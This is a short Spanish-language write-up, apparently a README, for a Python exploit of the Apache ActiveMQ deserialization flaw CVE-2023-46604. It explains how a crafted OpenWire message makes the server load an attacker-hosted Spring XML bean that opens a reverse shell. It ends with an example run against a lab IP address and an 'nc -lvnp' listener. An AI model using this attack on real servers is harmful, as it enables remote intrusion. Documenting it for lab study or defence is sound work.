Resumen Técnico del Ataque: CVE-2023-46604
El script explota una vulnerabilidad de deserialización insegura en Apache ActiveMQ (CVE-2023-46604) para lograr la ejecución remota de código en el servidor objetivo. Descripción del Proceso de Explotación
Objetivo de la Vulnerabilidad:
La vulnerabilidad reside en el protocolo OpenWire de Apache ActiveMQ.
Permite la deserialización insegura de objetos, lo que puede ser aprovechado para ejecutar código arbitrario en el servidor.
Requisitos Previos:
Acceso de red al servidor ActiveMQ.
Un archivo XML malicioso (poc.xml) disponible a través de una URL accesible por el servidor objetivo.
Componentes del Ataque:
Script Python: Automatiza el envío del payload malicioso al servidor ActiveMQ.
Archivo XML (poc.xml): Contiene un bean de Spring que define la ejecución de un comando malicioso (por ejemplo, abrir una shell inversa).
Pasos del Ataque
Preparación del Payload:
El script construye un mensaje en hexadecimal que incluye:
El nombre de la clase Java: org.springframework.context.support.ClassPathXmlApplicationContext.
La URL del archivo XML malicioso.
El payload se convierte en una secuencia de bytes que puede ser enviada a través del protocolo OpenWire.
Envío del Payload:
El script abre una conexión de socket TCP al servidor ActiveMQ en el puerto especificado (por defecto 61616).
Envía el payload malicioso al servidor.
Ejecución del Código Malicioso:
El servidor ActiveMQ deserializa el objeto especificado en el payload.
Debido a la deserialización insegura, se carga y ejecuta el bean de Spring definido en el archivo XML.
Este bean ejecuta un comando malicioso (por ejemplo, una shell inversa) en el servidor.
_________________________________________________________
ejemplo de ejecucion:
-
python3 CVE-2023-46604.py -i 10.10.11.243 -u http://10.10.16.2/poc.xml
-
nc -lvnp 9001
este script fue copiado y modificado en español:https://github.com/evkl1d/CVE-2023-46604.git